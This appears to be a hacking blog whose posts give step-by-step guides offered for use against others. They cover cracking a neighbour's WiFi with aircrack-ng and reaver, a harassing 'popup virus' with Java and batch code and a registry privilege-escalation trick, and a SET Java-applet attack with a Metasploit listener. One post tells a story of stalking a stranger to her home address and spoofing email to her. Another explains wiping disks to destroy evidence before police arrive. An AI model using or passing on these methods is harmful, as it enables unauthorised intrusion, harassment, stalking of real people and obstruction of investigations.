Listening to WFM radio......

Mostly SDR is similar to a radio receiver which can be used to listen to the transmissions on any frequency. In simple words it is like a radio receiver present on police cars, boats and small airplanes. 

Requirements:-
  1. Sdr dongle(antenna + front end)
  2. SDR#(decoder and interface)
If you are using sdr for the first time then we will advice you to follow the easy installation on rtl-sdr.org which helps you to install all the required drivers correctly.

How to?
  1. After extracting the files, run the intall.bat file.
  2. After the files are downloaded, open the sdrsharp folder and run the sdrsharp application program. 
  3. Now hit the configure button and then hit close.


  4. Then select WFM and hit an the play button. If it doesn't work adjust the rf gain.
  5. Now change the frequency to your desired frequency by clicking on the frequency(in example the frequency is 98.3 Mhz).


Note:-
I will not advice you to listen on frequency used by the police department and other services.
Posted by No comments :

Tracking Airplanes with sdr....

ADSB is the shot form of Automatic Dependent Surveillance–Broadcast is a kind of packet sent out by every plane in the sky this packet helps the ground station to locate an aircraft in the air.All aircraft transponders transmit data at the frequency 1090 MHz. To receive this transmissions one needs a receiver for this frequency - an ADS-B-receiver. The main flaw in this system is that there is no encryption of packets which mean anyone with the right setup can track planes.
Requirements:-
  1. Sdr dongle(antenna + front end)
  2. adsbsharp(decoder)
  3. adsbscope(interface software)



setup

If you are using sdr for the first time then we will advice you to follow the easy installation on rtl-sdr.org which helps you to install all the required drivers correctly.

How to?

  1. First from the sdrsharp package run the adsb# application( Just hit on start don't change anything).
  2. Now keep the adsb# running and open the adscscope application. Now click on other and then click on Network setup.
  3. Now configure your decoder by selecting adsb# and your machine by clicking on local host.
  4. Hit close and exit and go to network and select raw data client.
  5. Now after a few minutes you will see a few planes on the map and their details will be displayed on  the right panel.
Note:-
The dongle used in the demonstration is only a receiver and hence it cannot send anything thus you don't need any special permission for using it.
  
Posted by No comments :

Sniffing with Wireshark!!!

Wireshark is a network protocol analyzer which helps you to
tshark-i mon0
 sniff, store and analyze network traffic. It is built on top of tshark but displays everything in a more systematic way . It is available for almost all operating systems. The software consist of various filters which are used to filter specific packets which you want to analyze.

 Now whenever you start Wireshark you will have to select an interface for the list of interfaces. This decides that what all traffic you will be able to capture. To capture all the traffic in air with your wireless chip you can select the monitoring mode enabled card. To capture the all the traffic on a specific frequency you can also select your rtl-sdr.
using mon0 interface.
The best thing about Wireshark is that it can be integrated with different types of hardware and software. There are millions of Wireshark filters so you cannot memorize all of them but you can always refer to them whenever you want on https://www.wireshark.org/.


The only way to learn Wireshark is by experimenting. To get a copy you can download form the following link.
Posted by No comments :

Automated wireless hacking: wifi hacking the easy way!!!!!

Wifite is a python script which automates all the required process for wireless hacking. This script attempts all the wireless exploits one by one till it gets the key of the wireless network. The best tool for lazy hackers. :p

Requirements:-

  • A wireless card with monitoring mode.
  • Wifite.py file (It is already installed in Kali Linux).


 we will use Kali Linux for our demonstration.

 How to?

  1. Open a new terminal type wifite(in case of Kali for other distributions you might have to type ./python wifite.py ) 
  2. Select your interface name, in our case we only had one interface so we can skip this step.
  3. Now select the network which you want to hack we only have one network so we will give 1.
  4. Now wait till the script cracks the WEP or WAP key to give you an WEP key for the network.


 Note:-
If you want to set the parameter at the beginning you can do that as well which means that the script will use these parameter from the beginning  to check parameters you can type wifite -h .
You can also crack the hash if the script is unable to do so with other hash cracking scripts like hashcat and aircrack-ng.
Posted by No comments :

Coding popup virus....

Viruses have always been an important part of hacking for a long time. These malicious programs can help you perform specific commands on any victim computer. These are very helpful when you want to take revenge from a friend.  So we decided to teach you how to code popup viruses which are non lethal to the victim's computer.

 How to?

  1. The first step to code a nice virus is deciding what you want to display on your friend's computer. The commonly used phrases are "you are a dick" ," pay for your sins " and "f@## you!" , now the first thing to remember that these messages should be in string data type.
  2. The second part to create a popup virus is the infinite loop, this is a loo that has no end point. For example if you are coding a java virus your popup command should be inside while(true) {  }.
  3. The last step to save the file with suitable extension. For example if you are creating a bat file then you should save the program as filename.bat or if you are coding a java virus then you will need to save the files in the form of a jar executable  file.
Sample codes:-

 Java code:-
 private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {           
        while(true)
        {
        JOptionPane.showMessageDialog(this,"fuck you","pay for your sins",3);
        }

    } 

 Batch code:-
:top
@echo off
msg * (you fucked my life)
cls
msg * (now my turn)

cls
GOTOtop

 Note:-
For developing java viruses we will advice you to use netbeans as it makes the process of coding a lot easy. And as far as .bat scripting is considered notepad is the best tool you can use.

 In batch viruses you can use code like 
start iexplore.exe "www.google.com"

START %SystemRoot%\system32\notepad.exe
to open notepad and internet explorer. 

 You can also use the code by a google researcher to get admin access on windows:
reg add HKCU\Environment /v TEMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp

reg add HKCU\Environment /v TMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp

Posted by No comments :

Stalking advanced:Personal information gatheringher the fun way.

Disclaimer:-
This post is not based on any real life incident. The characters in this post are imaginary. Resemblance might be a coincidence. Through this post we don't intend to disrespect women or men in any way. This post is for mere entertainment and understanding of personal information gathering.  


At an airport, I saw a girl she was beautiful. I was standing behind her in the line to get the boarding cards. When she got her boarding card I was able to get a gaze on it. I saw some major details about her.
After getting my boarding card, I sat down at the lounge. I switched on my laptop. I was eager to know about her so I started searching, first I wanted to know where she was going so I searched the her fight  number on http://planefinder.net/ it was Goa
This is just a random search
then I was curious about her social life so I searched on  https://pipl.com/ for all the profiles with her name. I got her Facebook profile where I saw her about and found out her dad's name in family. So to find out how hard my ass will be kicked if I asked for her I searched her dad's name in linkedin.com this was a little horrifying. 
Then I went through her Facebook profile to find out her address. And luckily she had added a location of her house in a post which she had made public so I searched the coordinates in Google which gave me her address.

Then I opened https://emkei.cz/ to send her a fake mail but something stopped me. I found out that she was taken as I saw her boyfriend who came late and was on another flight. I switched off by laptop and when towards gate 5 to board the aircraft. Thinking that the people should have some representation that  can differentiate single and taken. 


Posted by No comments :

How I met your neighbor!!!!

There are 2 ways to hack an wireless network both of them require mon0 (monitoring mode) if you are not associated and authenticated to the network(connected).

Things that you might need:-

  1. Kali Linux on Vmware.
  2. Dlink dw-123.(or any other wireless card that supports monitoring mode)
Dictionary attack:- 
dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary.


 How to?

  1. Open a new terminal in Kali Linux and type airmon-ng start wlan0 and hit enter, here wlan0 can be replaced by interface name of your card.
  2.  Now type airodump-ng mon0 and hit enter to get the list of networks in your range.
  3. Now type airodump-ng --bssid target’s bssid -c channel number --write filename mon0 and hit enter to capture the packets of the target router.
  4. Now on a new terminal window type aireplay-ng -0 5 --ignore-negative-one -a essid  -c cleint essid mon0 to kick the user out and make him to authenticate himself once again which gives us an authentication frame.
  5. Now press Ctrl+c to stop the first terminal or close both terminals.
  6. Now type aircrack-ng -w path to wordlist” filename.cap and hit enter to crack the hash.

Limitations:-

If you don't have the word in the word-list than you cannot hack the password.

 Brute force attack:-
Brute Force Attack aims at being the simplest kind of method to gain access to a site: it tries usernames and passwords, over and over again, until it gets in.

 How to?
  1. Open a new terminal in Kali Linux and type airmon-ng start wlan0 and hit enter, here wlan0 can be replaced by interface name of your card.
  2.  Now type airodump-ng mon0 to get the list of networks in your range.
  3. Now to deploy reaver you will need to type reaver -i mon0  -b bssid -vv and hit enter, after a few minutes or hours you will get the wps key wpa key of the router.
Limitation:-
It takes a lot of time to crack the password and requires a stable traffic of the network.



Posted by No comments :

Monitoring mode(mon0)

Introduction:-
Wireless cards have 6 different modes each with it's own functionality:-
  1. Managed (Client) 
  2. Master (router)
  3. Ad-hoc (peer to peer)
  4. Mesh (planned ad-hoc)
  5. Repeater (WI-FI extender)
  6. Monitor 
Monitor mode is a special mode available in some of the wireless cards that allows you to sniff packets which are being sent form the router to the client even when you are not associated and authenticated to the network. You can also use it to authenticate the user who is associated and authenticated to the network. In other words it is like spying on all the networks in your range.
  
How to check your card? 
Open a terminal and type iw phy phy0 info | grep -A8 modes and hit enter. Here phy0 can be replaced with phy1,phy2,phy3,etc depending on your system.To find out this type airmon-ng and hit enter in the terminal.

How to switch it on?
 To enable monitor mode type ifconfig and hit enter on your terminal. It will give you a list of your interfaces list down the wireless interface name in our case it was wlan0. Now type airmon-ng start wlan0 and hit enter to start the monitor mode on your wireless card.

Is it working?
To check if the mon0 interface is working or not type tshark-i mon0 and hit enter.

What is it's use?
This mode is required for all sorts of WI-FI  hacking and sniffing.

Note:-
In our tests and hacks we are using a dlink dw-123 WIFI dongle. 
Posted by No comments :

When cops are at your door step!

When it comes to a cyber crime evidence can decide whether you will end up in a jail or walk out of the case with ease. From our past experience we have learned that just by deleting the files you can't undo what you have done and there are methods and tools to retrieve deleted data. Thus we decide to find out a way to delete everything which can help the investigators to prove you are guilty. DBAN(Darik's Boot and Nuke) is a Linux distribution which is designed to erase all the memory and traces of it from the drive. It is a self-contained boot image that securely wipes the hard disks of most computers. DBAN is appropriate for bulk or emergency data destruction.

 How to?

  1. Download the ISO file and created a boot-able CD or drive.
  2.  Now once you are done Plug the drive or the CD in your PC and restart it.
  3. Now once DBAN boots up then type autonuke or quick and hit enter.
  4.  Your disks will be wiped clean.

Note:-
Autonuke will delete the ISO burned on the the disk as well if you are using a pen-drive. You can hit F3 to get the list of all the commands....
Posted by No comments :

Java applet attack with SET

All browsers run  java applet which can be used to gain access to the system. The beauty of such attacks are that the exploit code never touches the disk so such an attack can't be detected by the antivirus. Except Mac all the operating systems are vulnerable to such attacks.

 How to?

  1. Open the terminal and then type service postgresql start & hit enter and then type service metasploit start & hit enter.
  2. Now after you are connected then type setoolkit & hit enter.
  3. Now select the option 1 and hit enter.
  4. Now select the option 2 which is website attack vectors and hit enter.
  5. Now select the option 1 which is the java applet one and hit enter.
  6. Now hit 2 which is site cloner and enter.And enter your ip address (remember the Ethernet one).
  7. Now according to your target select your payload and backdoor.
  8. Now on another terminal type msfconsole and hit enter the type use exploit/multi/handler and hit enter and now set the payload with the set payload command and port and ip with the set command and start the multi listener.



Note:- 
When the user goes to the link he/she will be be prompted with a message shown below till he or she clicks install.


Posted by No comments :

Port Scan:The easy way

Port scanning is a technique to scan a system for open ports which can be used for exploitation. This can be considered the first step for hacking. This process can be sometime more technical but we would like you to learn the easy way to do it.

How to?
Android:-
  1. In Fing, you can scan the ports just by selecting the host machine and then Service Scan.
  2. In Landroid, you can select port scan and then entering the ip of the target and then selecting Go.
  3. In Dsploit, you can select the host then select port scanner.
Kali Linux:-
  1. Open the terminal then type zenmap (GUI for nmap) and hit enter.
  2. Now in the target box type the target's ip and then select the scan type then hit scan.

Note:- If the system detects the scan or the port discovery is off then you will not get the results. 
Posted by No comments :
Subscribe to: Posts ( Atom )